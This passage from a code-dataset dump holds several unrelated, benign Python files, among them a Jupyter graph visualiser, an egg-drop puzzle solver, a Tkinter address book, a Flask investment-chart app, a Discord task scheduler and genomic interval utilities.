self.step(interval)\n\n # Yield solutions\n yield interval, self.solution_fields()\n\n # Update wlsewhere???\n self._v_prev.assign(self._v)\n\n def _update_solver(self, dt: float) -> None:\n \"\"\"Update the lhs matrix if timestep changes.\"\"\"\n if (abs(dt - float(self._timestep)) < 1e-12):\n return\n self._timestep.assign(df.Constant(dt))\n\n # Reassemble matrix\n df.assemble(self._lhs, tensor=self._lhs_matrix)\n","sub_path":"experiments/mirrored/coupled_monodomain.py","file_name":"coupled_monodomain.py","file_ext":"py","file_size_in_byte":7253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"629240568","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Utilities for displaying graphs with inline HTML in Jupyter Notebooks\"\"\"\n\nfrom random import sample\n\nfrom IPython.display import Javascript\n\nfrom pybel.io import to_jsons\nfrom .utils import render_template, default_color_map\nfrom ..mutation import add_canonical_names\n\n__all__ = ['to_jupyter', 'to_jupyter_str']\n\nDEFAULT_WIDTH = 1000\nDEFAULT_HEIGHT = 650\n\n\ndef generate_id():\n \"\"\"Generates a random string of letters\"\"\"\n return \"\".join(sample('abcdefghjkmopqrstuvqxyz', 16))\n\n\ndef to_jupyter(graph, width=DEFAULT_WIDTH, height=DEFAULT_HEIGHT, color_map=None):\n \"\"\"Displays the BEL graph inline in a Jupyter notebook.\n\n To use successfully, make run as the last statement in a cell inside a Jupyter notebook.\n\n :param pybel.BELGraph graph: A BEL graph\n :param width: The width of the visualization window to render\n :type width: int\n :param height: The height of the visualization window to render\n :type height: int\n :param color_map: A dictionary from PyBEL internal node functions to CSS color strings like #FFEE00. Defaults\n to :data:`default_color_map`\n :type color_map: dict\n :return: An IPython notebook Javascript object\n :rtype: :class:`IPython.display.Javascript`\n \"\"\"\n return Javascript(to_jupyter_str(graph, width=width, height=height, color_map=color_map))\n\n\ndef to_jupyter_str(graph, width=DEFAULT_WIDTH, height=DEFAULT_HEIGHT, color_map=None):\n \"\"\"Returns the string to be javascript-ified by the Jupyter notebook function :class:`IPython.display.Javascript`\n\n :param pybel.BELGraph graph: A BEL graph\n :param width: The width of the visualization window to render\n :type width: int\n :param height: The height of the visualization window to render\n :type height: int\n :param color_map: A dictionary from PyBEL internal node functions to CSS color strings like #FFEE00. Defaults\n to :data:`default_color_map`\n :type color_map: dict\n :return: The javascript string to turn into magic\n :rtype: str\n \"\"\"\n add_canonical_names(graph)\n gjson = to_jsons(graph)\n\n d3_code = render_template('pybel_vis.js')\n chart_id = generate_id()\n\n color_map = default_color_map if color_map is None else color_map\n\n javascript_vars = \"\"\"\n var chart = \"{}\";\n var width = {};\n var height = {};\n var graph = {};\n const color_map = {};\n \"\"\".format(chart_id, width, height, gjson, color_map)\n\n require_code = \"\"\"\n require.config({\n paths: {\n d3: '//cdnjs.cloudflare.com/ajax/libs/d3/4.5.0/d3.min'\n }\n });\n\n var elementInnerHTML = \"
\";\n\n element.append(elementInnerHTML);\n\n var chartQualified = \"#\" + chart;\n\n require(['d3'], function(d3) {\n return init_d3_force(d3, graph, chartQualified, width, height, color_map);\n });\n \"\"\"\n\n result = d3_code + javascript_vars + require_code\n\n return result\n","sub_path":"src/pybel_tools/visualization/inline.py","file_name":"inline.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"441613776","text":"def attemptsDefinition(buildingFloors):\n\n ## GETS number of floors the building has\n ## RETURNS the maximum less attempts you could try for finding the break floor\n\n maxAttempts = 0\n checkAttempts = 0\n\n while True:\n maxAttempts += 1\n for x in range(maxAttempts):\n checkAttempts = checkAttempts + maxAttempts - x\n if checkAttempts > buildingFloors: break\n checkAttempts = 0\n\n return maxAttempts\n\ndef showChecks(buildingFloors, breakFloor, maxAttempts):\n\n ## GETS the break floor and the maximum less attempts you could try for finding the break floor\n ## PRINTS the way to find the break floor\n\n x = 0\n index = 0\n checkAttempts = 0\n\n while checkAttempts < breakFloor:\n checkAttempts = checkAttempts + maxAttempts - x\n x += 1\n if checkAttempts < breakFloor:\n index += 1\n print(str(index) + \". Thrown from floor \" + str(checkAttempts) + \" and NOT broke\")\n elif checkAttempts < buildingFloors:\n if index is 0:\n index = 1\n print(str(index) + \". Thrown from floor \" + str(checkAttempts) + \" and BROKE\")\n\n y = checkAttempts - maxAttempts + x\n while True:\n index += 1\n if y >= breakFloor:\n print(str(index) + \". Thrown from floor \" + str(y) + \" and BROKE - the choosen floor !!\")\n break\n else:\n print(str(index) + \". Thrown from floor \" + str(y) + \" and NOT broke\")\n y += 1\n\nprint(\"QUESTION:\\n*** You've got 2 eggs for finding from which floor the eggs will break.\")\nprint(\"*** Find the less maximum attempts you should take for throwing the eggs and finding this floor.\")\n\nerrorMsg = \"ILLEGAL VALUE\"\n\nwhile True:\n try:\n buildingFloors = int(input(\"* ENTER How many floors has this building? \"))\n break\n except ValueError:\n print(errorMsg)\n\nwhile True:\n try:\n breakFloor = int(input(\"* ENTER Which floor to find? \"))\n if breakFloor > buildingFloors: raise ValueError()\n break\n except ValueError:\n print(errorMsg)\n\nmaxAttempts = attemptsDefinition(buildingFloors)\nprint(\"\\nANSWER:\\n*** The maximum attempts for any floor in this building: \" + str(maxAttempts))\nshowChecks(buildingFloors, breakFloor, maxAttempts)\n\ninput(\"\\n* PRESS ENTER to exit \")\n","sub_path":"(1)Eggs.py","file_name":"(1)Eggs.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"225083605","text":"\n\nfrom xai.brain.wordbase.nouns._reformation import _REFORMATION\n\n#calss header\nclass _REFORMATIONS(_REFORMATION, ):\n\tdef __init__(self,): \n\t\t_REFORMATION.__init__(self)\n\t\tself.name = \"REFORMATIONS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"reformation\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_reformations.py","file_name":"_reformations.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"113480456","text":"from multiprocessing import Pool, cpu_count\nfrom multiprocessing.pool import ThreadPool\nimport socket\nserver = socket.socket()\nserver.bind(('',8888))\nserver.listen(200) #并发\n#处理对等连接\ndef worker_thread(conn):\n while True:\n recv_data = conn.recv(1024)\n if recv_data:\n conn.send(recv_data)\n else:\n conn.close()\n break\n##处理server连接\ndef worker_process(server):\n threadpool = ThreadPool(cpu_count())\n\n while True:\n conn,addr = server.accept()\n threadpool.apply_async(worker_thread,(conn,))\n # threadpool.close()\n # threadpool.join()\nn = cpu_count()\npool =Pool(n)\nfor i in range(n):\n pool.apply_async(worker_process,args=(server,),kwds={})\npool.close()\npool.join()\n\n","sub_path":"00000003并发/20180628 Pool/pypool.py","file_name":"pypool.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"47188538","text":"from tkinter import *\nfrom tkinter import messagebox\n\nimport sqlite3 \n\ncon = sqlite3.connect('database.db')\ncur = con.cursor()\n\n\nclass AddPeople(Toplevel):\n def __init__(self):\n Toplevel.__init__(self)\n \n self.geometry(\"650x550+600+200\")\n self.title(\"Add New person\")\n self.resizable(False,False)\n\n\n self.top = Frame(self,height=\"150\",bg=\"white\")\n self.top.pack(fill=X)\n \n self.bottom = Frame(self,heigh='500',bg='powder blue')\n self.bottom.pack(fill = X)\n\n # Image\n self.top_img = PhotoImage(file='icon/people.png')\n self.top_img_label = Label(self.top,image=self.top_img,bg='white')\n self.top_img_label.place(x=70,y=25)\n\n\n #Heading\n self.top_heading = Label(self.top,text=\"Add New person\",font=\"arial 20 bold\",bg = 'white', fg=\"#ebb434\")\n self.top_heading.place(x=150,y=30)\n \n # name \n self.name = Label(self.bottom,text=\"Name\",font=\"arial 15 bold\")\n self.name.place (x=40,y=40)\n\n self.name_entry = Entry(self.bottom,width=30,bd=4)\n self.name_entry.insert(0,\"enter name\")\n self.name_entry.place(x=150,y=40)\n \n # Name\n\n self.name = Label(self.bottom,text=\"Name:\",font=\"arial 15 bold\",bg=\"powder blue\")\n self.name.place (x=40,y=40)\n #Name Entyr\n self.name_entry = Entry(self.bottom,width=30,bd=4)\n self.name_entry.insert(0,\"Enter Name\")\n self.name_entry.place(x=150,y=40)\n # Sure Name\n self.surename = Label(self.bottom,text=\"Surename:\",font =\"arial 15 bold\",bg=\"powder blue\")\n self.surename.place(x=40,y=80)\n #Sure_name Entry\n self.surename_entry = Entry(self.bottom,width=30,bd=4)\n self.surename_entry.insert(0,\"Enter Surename\")\n self.surename_entry.place(x=150,y=80)\n #Email\n self.email = Label(self.bottom,text='Email:',font = \"arial 15 bold\",bg =\"powder blue\" )\n self.email.place(x = 40,y=120)\n #email entry\n self.email_entry = Entry(self.bottom,widt=30,bd = 4)\n self.email_entry.insert(0,\"Enter Email\")\n self.email_entry.place(x=150,y=120)\n # Phone number\n self.phone = Label(self.bottom,text=\"Phone:\",font = \"arial 15 bold\",bg = \"powder blue\")\n self.phone.place(x=40,y=160)\n #Phone Entry\n self.phone_entry = Entry(self.bottom,bd =4,width=30)\n self.phone_entry.insert(0,\"Enter Phone Numebr\")\n self.phone_entry.place(x=150,y=160)\n #Address \n self.address = Label(self.bottom,text=\"Address:\",font = \"arial 15 bold\",bg = \"powder blue\")\n self.address.place(x=40,y=200)\n #Phone Entry\n self.address_entry = Text(self.bottom,bd = 4,width=30,height=6)\n \n self.address_entry.place(x=150,y=200)\n\n self.botton = Button(self.bottom,text=\"Add person\",bd=5,command = self.add_people)\n self.botton.place(x=300,y = 320)\n\n\n def add_people(self):\n name = self.name_entry.get()\n surename = self.surename_entry.get()\n email = self.email_entry.get()\n phone = self.phone_entry.get()\n address = self.address_entry.get(1.0,'end-1c')\n \n if name and surename and email and phone and address != '' :\n # add to database\n try:\n # insutrt into addressbook(Person_name.Person_surename,Person_email,Person_phone,Person_address)\n \n query = \"insert into 'addressbook'(Person_name,Person_surename,Person_email,Person_phone,Person_address) values(?,?,?,?,?)\"\n \n cur.execute(query,(name,surename,email,phone,address))\n con.commit()\n messagebox.showinfo(\"Success\",\"Content added\")\n except EXCEPTION as e :\n messagebox.showinfo(\"Error\",str(e)) \n\n else:\n messagebox.showerror(\"Error\",\"Fill all the Fields\", icon=\"warning\")\n\n \n\n\n\n\n ","sub_path":"add_people.py","file_name":"add_people.py","file_ext":"py","file_size_in_byte":3982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"596953938","text":"\nimport os\nimport tempfile\nimport argparse\nimport json\n\ndef my_func():\n parser = argparse.ArgumentParser(description=\"store the data in storage\")\n parser.add_argument(\"--key\", type=str, help=\"the key\")\n parser.add_argument(\"--val\", help=\"the value\")\n args = parser.parse_args()\n\n if not os.path.exists(os.path.join(tempfile.gettempdir(), 'storage.data')):\n d = {}\n if args.key and args.val:\n d[args.key] = []\n d[args.key].append(args.val)\n storage_path = os.path.join(tempfile.gettempdir(), 'storage.data')\n\n with open(storage_path, 'w') as f:\n json.dump(d, f)\n \n \n else:\n with open(os.path.join(tempfile.gettempdir(), 'storage.data')) as feed:\n d = json.load(feed)\n\n if args.key and args.val:\n if args.key not in d.keys():\n d[args.key] = []\n d[args.key].append(args.val)\n elif args.key in d.keys():\n d[args.key].append(args.val)\n with open(os.path.join(tempfile.gettempdir(), 'storage.data'), 'w') as f:\n json.dump(d, f)\n\n\n if args.key and not args.val:\n with open(os.path.join(tempfile.gettempdir(), 'storage.data')) as json_file:\n data = json.load(json_file)\n if data.get(args.key) != None:\n print(*(data.get(args.key)), sep=', ')\n else:\n print('')\n\nif __name__ == \"__main__\":\n my_func()","sub_path":"storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"247351028","text":"# Import the PyQt and QGIS libraries\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom qgis.core import *\nimport qgis.utils\nimport os.path\nimport datetime\n\nimport xml.etree.ElementTree as ET\n\nfrom ..tools import Tools\nfrom ..data.requests.menuItem import MenuItem\n\n\nclass DataMenu:\n\n ###############################\n def __init__(self, layout):\n # TODO assert treeview\n self.view = QTreeView()\n layout.addWidget(self.view)\n\n self.view.setUniformRowHeights(True)\n self.view.setHeaderHidden(True)\n self.view.setSelectionMode(QAbstractItemView.NoSelection)\n self.view.setExpandsOnDoubleClick(False)\n self.view.setRootIsDecorated(False)\n\n # self.view.setAttribute(Qt.WA_NoMousePropagation)\n self.view.pressed.connect(self.handleDataMenuPressed)\n # self.view.clicked.connect(self.handleDataMenuClicked)\n # self.view.activated.connect(self.handleDataMenuActivated)\n\n self.viewModel = QStandardItemModel()\n self.view.setModel(self.viewModel)\n\n self.loadMenuData()\n\n # def loadMenuData(self): #pre-search version\n def loadMenuData(self, text=\"\"):\n Tools.dataMenuDict = {}\n self.viewModel.clear()\n\n # load from v drive\n # corpMenuSuccess = self.parseMenu() #pre-search version\n corpMenuSuccess = self.parseMenu(\"\", text)\n\n # check for XP\n userFiles = os.path.expanduser(\"~\")\n if \"Users\" in userFiles:\n # win7\n userFile = userFiles + \"/Documents/\" + Tools.menuFileName\n else:\n #xp\n userFile = userFiles + \"/My Documents/\" + Tools.menuFileName\n\n personalMenuSuccess = False\n # check file exists\n if os.path.isfile(userFile):\n # personalMenuSuccess = self.parseMenu(userFile) #pre-search version\n personalMenuSuccess = self.parseMenu(userFile, text)\n\n if not (corpMenuSuccess or personalMenuSuccess):\n #Tools.logError(\"Unable to load menu.xml files.\\nPlease check your V: drive is mapped or USB drive connected.\\nIf these are correct please check the settings under QGIS Tools > Tools > Settings > Data Locations.\")\n Tools.debug(\"Unable to load menu.xml files.\\nPlease check your V: drive is mapped or USB drive connected.\\nIf these are correct please check the settings under QGIS Tools > Tools > Settings > Data Locations.\")\n###########################################\n\n def handleDataMenuPressed(self, index):\n \"\"\" Action a MenuItem or expand/collapse a menu branch as required. \"\"\"\n assert isinstance(index, QModelIndex), \"Bad Parameter\"\n\n mouseState = QApplication.mouseButtons()\n if (mouseState == Qt.RightButton):\n index = self.viewModel.index(0, 0)\n self.view.setCurrentIndex(index)\n self.view.collapseAll()\n return\n\n Tools.cddpTechnique = \"menu\"\n modelNode = self.viewModel.itemFromIndex(index)\n\n if (modelNode.columnCount() == 0):\n # menu leaf, will correspond with a menu item\n Tools.selectTopLegendItem()\n menuItem = Tools.dataMenuDict[Tools.getModelNodePath(modelNode)]\n menuItem.doLoad()\n # Tools.checkForOTFReprojection();\n else:\n # menu branch, will correspond with a menu branch\n self.view.setExpanded(index, not self.view.isExpanded(index))\n Tools.flushErrors()\n\n\n############################################################\n # def parseMenuElement(self, XMLMenuElement, targetModel): #pre search version\n def parseMenuElement(self, XMLMenuElement, targetModel, text):\n \"\"\" Attach a node to the targetModel then populate it with data from the XMLMenuElement. \"\"\"\n assert isinstance(XMLMenuElement, ET.Element), \"Bad Parameter\"\n assert (isinstance(targetModel, QStandardItemModel) or\n isinstance(targetModel, QStandardItem)), \"Bad Parameter\" + str(type(targetModel))\n\n modelNode = QStandardItem()\n modelNode.setIcon(Tools.iconFolder)\n targetModel.appendRow(modelNode)\n modelNode.setFlags(Qt.ItemIsEnabled)\n modelNode.setText(Tools.getAttributeFromElement(XMLMenuElement, \"TITLE\"))\n\n for child in XMLMenuElement:\n tag = child.tag.lower()\n if tag[0] == \"q\":\n tag = tag[1:]\n elif tag[0] == \"a\":\n continue\n if (tag == \"menu\"):\n # self.parseMenuElement(child,modelNode) #pre search version\n self.parseMenuElement(child, modelNode, text)\n elif (tag == \"item\"):\n # MenuItem.parseXML(child,modelNode) #pre search version\n MenuItem.parseXML(child, modelNode, text)\n else:\n # unknown xml\n Tools.logError(\"Menu Error: unknown xml element \" + tag)\n\n # validate menu element\n if modelNode.rowCount() == 0:\n # Tools.logError(\"Menu Error: No children found for \" + modelNode.text())\n targetModel.removeRow(targetModel.rowCount() - 1)\n\n\n########################\n # def parseMenu(self,xmlLocation=\"\"): #pre search version\n def parseMenu(self, xmlLocation=\"\", text=\"\"):\n noise = False\n if xmlLocation == \"\":\n xmlLocation = os.path.join(Tools.corpMenuLocation, Tools.menuFileName)\n\n if xmlLocation != \"\":\n tree = ET.parse(xmlLocation)\n root = tree.getroot()\n for child in root:\n tag = child.tag.lower()\n if tag[0] == \"q\":\n tag = tag[1:]\n elif tag[0] == \"a\":\n continue\n if (tag == \"menu\"):\n # self.parseMenuElement(child, self.viewModel) #pre search version\n self.parseMenuElement(child, self.viewModel, text)\n elif (tag == \"item\"):\n # MenuItem.parseXML(child,self.viewModel) #pre search version\n MenuItem.parseXML(child, self.viewModel, text)\n # self.parseMenuElement(child,self.viewModel)\n else:\n # unknown xml\n Tools.logError(\"Menu Error: unknown xml element \" + tag)\n if len(text) >= 3:\n self.view.expandAll()\n return True\n else:\n return False\n","sub_path":"i18n/ymac/gis/qgis/ui/datamenu.py","file_name":"datamenu.py","file_ext":"py","file_size_in_byte":6451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"388301012","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"feri-urnik\",\n version=\"1.0.0\",\n author=\"Urban Knupleš\",\n author_email=\"urbikn@gmail.com\",\n description=\"A FERI schedule running in CLI\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/urbikn/feri-urnik\",\n packages=setuptools.find_packages(),\n license='MIT',\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Topic :: Office/Business :: Scheduling\",\n \"Operating System :: POSIX :: Linux\",\n ],\n keywords='FERI, urnik, scheduler, Wise timetable, timetable, iCal, CLI',\n python_requires='>=3.6',\n include_package_data=True,\n install_requires=['selenium', 'icalevents==0.1.25 ', 'pyyaml', 'fuzzywuzzy', 'Unidecode==1.1.1', \"python-Levenshtein\"],\n package_data={\n 'urnik': [\"*.yaml\", 'data/*.tar.gz'],\n },\n entry_points={\n 'console_scripts': [\n 'urnik= urnik.main:main',\n ],\n },\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"427712060","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom flask import (Flask, jsonify, render_template, request)\nfrom flask import render_template\nfrom flask_cors import CORS\nimport investlib.invest as invest\n\napp = Flask(__name__)\nCORS(app)\napp.config['SECRET_KEY'] = 'Hello from the secret world of Flask! ;)'\n\n\n@app.route(\"/\")\ndef handle_index():\n return (render_template('index.html'))\n\n\n@app.route(\"/chart\", methods=[\"GET\", \"POST\"])\ndef handle_chart_generate():\n print(\"Request data: \", request.args)\n user_data = request.args.to_dict(flat=True)\n\n user_input = {\n 'start_balance': 10000,\n 'buy_threshold': 1.0,\n 'sell_threshold': 1.0,\n 'stock_price': 100,\n 'buy_batch': 10,\n 'sell_batch': 10,\n 'transactions': 1000,\n 'stock': 'SPY',\n 'start_date': '2010-01-01',\n 'end_date': '2020-12-31',\n 'price_type': 'close',\n 'frequency': 'weekly'\n }\n for key,value in user_data.items():\n user_input[key] = value\n\n\n print(\"Final user innput to investlib: \", user_input)\n\n obj = invest.run_stock_iterations(user_data['stock'], **user_input)\n\n return jsonify(obj)\n\n\ndef main():\n app.run(host='127.0.0.1', port=5006, debug=True)\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"invest_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"188716423","text":"from django.db import models\nfrom django.contrib.auth import get_user_model\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom . import Language\n\n\nclass LanguageHistory(models.Model):\n # CHOICES\n\n # DATABASE FIELDS\n # Foreign Keys\n editor = models.ForeignKey(\n get_user_model(),\n on_delete=models.PROTECT,\n related_name='language_histories',\n related_query_name='language_history',\n verbose_name=_('Editor Id')\n )\n language = models.ForeignKey(\n Language,\n on_delete=models.CASCADE,\n related_name='language_histories',\n related_query_name='language_history',\n verbose_name=_('Language Id')\n )\n # Fields\n name = models.CharField(\n _('Language Name'),\n max_length=100,\n help_text=_(\"Name of the language.\")\n )\n native_name = models.CharField(\n _('Native Language Name'),\n max_length=100,\n help_text=_(\"Name of language and written in native of it's Language\")\n )\n iso_639_1 = models.CharField(\n _('ISO 639-1'),\n max_length=2,\n help_text=_('more info in Wikipedia.')\n )\n iso_639_2 = models.CharField(\n _('ISO 639-2'),\n max_length=3,\n help_text=_('more info in Wikipedia.')\n )\n description = models.TextField(\n _('Description'),\n blank=True,\n help_text=_(\"Description about the language.\")\n )\n timestamp = models.DateTimeField(\n _('Edited Timestamp'),\n auto_now_add=True\n )\n\n # MANAGERS\n objects = models.Manager()\n\n # META CLASS\n class Meta:\n verbose_name = _('language history')\n verbose_name_plural = _('languages histories')\n\n # TO STRING METHOD\n def __str__(self):\n return self.name\n\n # SAVE METHOD\n def save(self, *args, **kwargs):\n # do_something()\n super().save(*args, **kwargs)\n # do_something_else()\n\n # ABSOLUTE URL METHOD\n # def get_absolute_url(self):\n # return reverse('language-detail', kwargs={'pk': self.id})\n\n # OTHER METHODS\n","sub_path":"language/models/languageHistory.py","file_name":"languageHistory.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"4521170","text":"from functools import wraps\nfrom threading import RLock\nfrom types import FunctionType, MethodType\n\nfrom graphility.database import Database\nfrom graphility.database_safe_shared import th_safe_gen\nfrom graphility.env import cdb_environment\n\ncdb_environment[\"mode\"] = \"threads\"\ncdb_environment[\"rlock_obj\"] = RLock\n\n\nclass SuperLock(type):\n @staticmethod\n def wrapper(f):\n @wraps(f)\n def _inner(*args, **kwargs):\n db = args[0]\n with db.super_lock:\n return f(*args, **kwargs)\n\n return _inner\n\n def __new__(cls, classname, bases, attr):\n new_attr = {}\n for base in bases:\n for b_attr in dir(base):\n a = getattr(base, b_attr, None)\n if isinstance(a, MethodType) and not b_attr.startswith(\"_\"):\n if b_attr in (\"flush\", \"flush_indexes\"):\n pass\n else:\n new_attr[b_attr] = SuperLock.wrapper(a)\n for attr_name, attr_value in attr.items():\n if isinstance(attr_value, FunctionType) and not attr_name.startswith(\"_\"):\n attr_value = SuperLock.wrapper(attr_value)\n new_attr[attr_name] = attr_value\n new_attr[\"super_lock\"] = RLock()\n return type.__new__(cls, classname, bases, new_attr)\n\n\nclass SuperThreadSafeDatabase(Database, metaclass=SuperLock):\n \"\"\"\n Thread safe version that always allows single thread to use db.\n It adds the same lock for all methods, so only one operation can be\n performed in given time. Completely different implementation\n than ThreadSafe version (without super word)\n \"\"\"\n\n __metaclass__ = SuperLock\n\n def __patch_index_gens(self, name):\n ind = self.indexes_names[name]\n for c in (\"all\", \"get_many\"):\n m = getattr(ind, c)\n if getattr(ind, c + \"_orig\", None):\n return\n m_fixed = th_safe_gen.wrapper(m, name, c, self.super_lock)\n setattr(ind, c, m_fixed)\n setattr(ind, c + \"_orig\", m)\n\n def open(self, *args, **kwargs):\n res = super(SuperThreadSafeDatabase, self).open(*args, **kwargs)\n for name, _ in self.indexes_names.items():\n self.__patch_index_gens(name)\n return res\n\n def create(self, *args, **kwargs):\n res = super(SuperThreadSafeDatabase, self).create(*args, **kwargs)\n for name, _ in self.indexes_names.items():\n self.__patch_index_gens(name)\n return res\n\n def add_index(self, *args, **kwargs):\n res = super(SuperThreadSafeDatabase, self).add_index(*args, **kwargs)\n self.__patch_index_gens(res)\n return res\n\n def edit_index(self, *args, **kwargs):\n res = super(SuperThreadSafeDatabase, self).edit_index(*args, **kwargs)\n self.__patch_index_gens(res)\n return res\n","sub_path":"graphility/database_super_thread_safe.py","file_name":"database_super_thread_safe.py","file_ext":"py","file_size_in_byte":2881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"214806006","text":"import asyncio\nfrom datetime import datetime, timezone\n\nfrom discord.ext import commands\n\nclass ScheduledTask:\n def __init__(self, trigger_time, action, args):\n self.trigger_time = trigger_time\n self.action = action\n self.args = args\n\n\nscheduled_tasks = []\n\n\ndef add_task(trigger_time, action, args):\n scheduled_tasks.append(ScheduledTask(trigger_time, action, args))\n\n\nclass ExecutorCog(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.version = \"0.1\"\n self.loop = asyncio.get_event_loop()\n self.task = self.loop.create_task(self.periodic_task_check())\n\n async def periodic_task_check(self):\n while True:\n tasks_to_execute = []\n for task in scheduled_tasks:\n if task.trigger_time < datetime.utcnow():\n tasks_to_execute.append(task)\n for task in tasks_to_execute:\n await task.action(**task.args)\n scheduled_tasks.remove(task)\n await asyncio.sleep(15)\n\n def cog_unload(self):\n self.task.cancel()\n\n\ndef setup(bot):\n bot.add_cog(ExecutorCog(bot))\n\n\ndef teardown(bot):\n bot.remove_cog(ExecutorCog(bot))\n","sub_path":"src/tbdbot/cogs/scheduled_tasks.py","file_name":"scheduled_tasks.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"52976626","text":"\"\"\" Pass\n\"\"\" \nimport numpy as np\nimport pandas as pd\nfrom bx.intervals.intersection import Intersecter, Interval\nfrom collections import defaultdict\nfrom IPython import embed\n\n\ndef fuzzy_ends(df):\n tdf = df.loc[:, ['outer_start', 'start','inner_start']]\n sstart = tdf.apply(np.min, axis=1)\n df.loc[:,'sstart'] = sstart.astype(np.int32)\n tdf = df.loc[:, ['outer_stop', 'stop','inner_stop']]\n sstop = tdf.apply(np.max, axis=1)\n df.loc[:, 'sstop'] = sstop.astype(np.int32)\n return(df)\n\n\n\ndef fuzzy_diff(df):\n \"\"\" This was the third try for this, still\n very slow. \n \"\"\"\n sstart = np.zeros(df.shape[0], dtype=np.int64)\n sstop = np.zeros(df.shape[0], dtype=np.int64)\n enum = 0\n for _, j in df.iterrows():\n if not pd.isnull(j['outer_start']):\n sstart[enum] = j['outer_start']\n else:\n try:\n sstart[enum] = j['start']\n except ValueError:\n sstart[enum] = j['inner_start']\n if not pd.isnull(j['outer_stop']):\n sstop[enum] = j['outer_stop']\n else:\n try:\n sstop[enum] = j['stop']\n except ValueError:\n sstop[enum] = j['inner_stop']\n enum += 1\n df.loc[:,'sstart'] = sstart\n df.loc[:,'sstop'] = sstop\n return(df)\n\n\ndef filter_by_size(df, max_size=3e6):\n '''\n '''\n df = fuzzy_ends(df)\n diff = (df.sstop - df.sstart)\n df = df.ix[diff < float(max_size), :]\n return(df)\n\n\ndef generate_unique_mapping(udf, df, \n ncollisions=3, nstudies=2):\n ''' Exact matching by sstop and sstart\n '''\n hits_uids = []\n comp_dict = {}\n for _, j in udf.iterrows():\n comp_dict[(j['chr'], j['var_type'],\n j.sstart, j.sstop)] = j.uID\n\n for _, j in df.iterrows():\n try:\n hits_uids.append(comp_dict[(j['chr'],\n j['var_type'],\n j.sstart, j.sstop)])\n except KeyError:\n # there shouldn't bee any key errors\n hits_uids.append('missing')\n '''\n qstring = ('sstart > {0} & '\n 'sstop <= {1} & '\n 'chr == {2}'\n 'var_type == {3}'\n )\n qtest = udf.query(qstring.format(j.sstart, \n j.sstop, j.chr))\n embed()\n '''\n pass\n df['uID'] = hits_uids\n return(df)\n\n\ndef reverse_dictionary(dictionary):\n new_dict = {}\n for i, j in dictionary.iteritems():\n for k in j:\n new_dict[k] = i\n return(new_dict)\n \n\ndef remove_singleton_exp_variants(df, study_dict,\n nstudies=2):\n \"\"\"\n \"\"\"\n ugroups = df.groupby('uID')\n \n more_than_one = []\n uid_index = []\n study_list = []\n for name, group in ugroups:\n studies = [study_dict[i] for i in group.index]\n study_list.extend(studies)\n studies = set(studies)\n uid_index.append(name)\n if len(studies) >= nstudies:\n more_than_one.append(True)\n print('Yes')\n else:\n more_than_one.append(False)\n out_s = pd.Series(more_than_one, index = uid_index)\n return(out_s, study_list)\n\n\n\ndef copy_test(df):\n \"\"\" Copy number variant testing\n \"\"\"\n # :TODO change to groups\n dfg = ((df['var_type'] == 'copy number gain') |\\\n ( df['var_type'] == 'copy number loss') |\\\n ( df['var_type'] == 'copy number variation'))\n # append together\n cnv = df.ix[dfg, :]\n return(cnv) \n","sub_path":"py/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"5337621","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 1 18:18:50 2021\n\n@author: tardis\n\"\"\"\nimport sys\nimport pandas as pd\nimport myvariant\n\n# Used to create a report in pdf format\nfrom reportlab.platypus import SimpleDocTemplate\nfrom reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle\nfrom reportlab.platypus import Paragraph\nfrom reportlab.lib.enums import TA_JUSTIFY\n\n\n# Get data from given database: 'civic', 'clinvar', 'cosmic', 'snpeff' or anywhere it can find\ndef _pull_data(dir_, database):\n # Create an empty list to store annotations\n variant_annotations = []\n evidence_items = []\n info = []\n \n # Get information about variant\n if 'civic' in dir_ and database == 'civic':\n gene_ = dir_[database]['entrez_name']\n protein_change_ = dir_[database]['name']\n 